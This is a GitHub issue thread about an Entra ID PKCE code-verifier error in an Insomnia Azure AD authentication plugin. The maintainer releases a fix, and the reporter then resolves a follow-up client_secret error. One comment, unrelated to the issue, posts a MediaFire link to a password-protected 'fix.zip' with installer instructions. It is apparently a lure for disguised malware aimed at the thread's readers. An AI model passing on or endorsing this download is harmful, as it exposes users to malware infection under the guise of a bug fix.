### ISSUE TITLE
Error AADSTS501481: The Code_Verifier does not match the code_challenge supplied in the authorization request.

### ISSUE THREAD

**Issue by Thesharing** [GillesZunino/insomnia-plugin-azure-ad-authentication#14]
When requesting the authentication using `insomnia-plugin-azure-ad-authentication`, I met the error:

```
invalid_grant - 501481 - [2024-08-29 03:22:33Z]: AADSTS501481: The Code_Verifier does not match the code_challenge supplied in the authorization request.
```

The request params:

* Function to Perform: Entra ID Token — Get a Microsoft Entra ID token
* Authority: Entra ID global service — https://login.microsoftonline.com
* Scopes: openid profile offline_access
* Redirect URI: http://127.0.0.1:1234/redirect
* Token Grant Flow: OAuth 2.0 Auth Code grant with PKCE — Authenticate interactively with Web Browser
* Token Type: Access Token — Securely call web APIs, authenticate and authorize

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Thesharing** [comment]
An issue that may be related: https://github.com/AzureAD/microsoft-authentication-library-for-js/issues/5044

**Comment by GillesZunino** [comment]
Hopefully fixed by release 1.1.3. Let me know if this does not work

**Comment by Thesharing** [comment]
Hi @GillesZunino Thank you so much for addressing this issue in a short time! I've updated the version to 1.1.3 and met another issue:

> invalid_client - Error(s): 7000218 - Timestamp: 2024-08-30 10:05:08Z - Description: AADSTS7000218: The request body must contain the following parameter: 'client_assertion' or 'client_secret'.

I've followed the steps of this comment: https://github.com/MicrosoftDocs/azure-docs/issues/61446#issuecomment-1211050692 and it solves the issue.
